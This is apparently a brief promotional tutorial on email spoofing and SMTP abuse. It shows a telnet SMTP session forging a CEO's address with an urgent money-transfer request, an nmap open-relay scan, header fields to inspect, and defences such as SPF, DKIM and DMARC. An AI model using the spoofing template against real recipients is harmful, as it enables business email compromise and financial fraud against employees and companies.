Email Hacking — SMTP Exploitation & Email Spoofing

Email Hacking & SMTP Exploitation

Email was designed in the 1970s with zero security. It's shockingly easy to exploit.

Email Spoofing

SMTP (Simple Mail Transfer Protocol) doesn't verify sender identity by default. Anyone can send an email as anyone.

# Connect to SMTP server
telnet mail-server.com 25

HELO hacker.com
MAIL FROM: 
RCPT TO: 
DATA
Subject: Urgent Transfer Required
From: CEO 

Please transfer ₹50,00,000 to account XXXX immediately.
This is urgent and confidential.

.
QUIT

This email appears to come from the CEO!

Open Relay Exploitation

# Find open SMTP relays
nmap -p 25 --script smtp-open-relay target

Open relays allow anyone to send email through the server — used for spam and phishing.

Email Header Analysis

# Look for:
Received: headers — trace the actual path
X-Originating-IP — real sender IP
SPF result — PASS or FAIL
DKIM result — signature verification
DMARC result — policy check

Business Email Compromise (BEC)

BEC attacks caused $2.7 billion in losses in 2023 alone. Attackers impersonate executives to authorize wire transfers.

Protection

• 🔒 Configure SPF, DKIM, and DMARC records
• 🔒 Use email authentication (S/MIME, PGP)
• 🔒 Train employees to verify sensitive requests
• 🔒 Enable 2FA on all email accounts

🔥 Learn email security at ONLY4YOU →